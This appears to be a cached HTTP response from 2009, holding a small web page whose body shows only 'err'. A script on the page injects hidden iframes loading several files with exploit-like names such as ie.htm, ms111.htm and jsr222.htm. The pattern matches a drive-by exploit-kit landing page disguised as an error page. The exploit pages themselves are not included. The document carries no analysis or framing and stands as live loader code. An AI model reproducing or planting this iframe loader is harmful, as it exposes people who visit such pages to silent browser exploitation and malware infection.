HTTP/1.1 200 OK
Content-Length: 360
ETag: "fab203c4a1c91:475"
Date: Tue, 03 Mar 2009 02:21:43 GMT
Last-Modified: Mon, 18 Aug 2008 15:51:10 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://jj.cnmjm.net/a11.htm
X-Polipo-Date: Tue, 03 Mar 2009 02:33:13 GMT
X-Polipo-Access: Tue, 03 Mar 2009 02:33:13 GMT

<body>err
<script language="javascript">

document.writeln("<iframe src=\"a1111.htm\"><\/iframe><iframe src=\"a6111.htm\"><\/iframe><iframe src=\"jsr222.htm\"><\/iframe><iframe src=\"ie.htm\"><\/iframe><iframe src=\"ms111.htm\"><\/iframe>");

</script>


</BODY>












































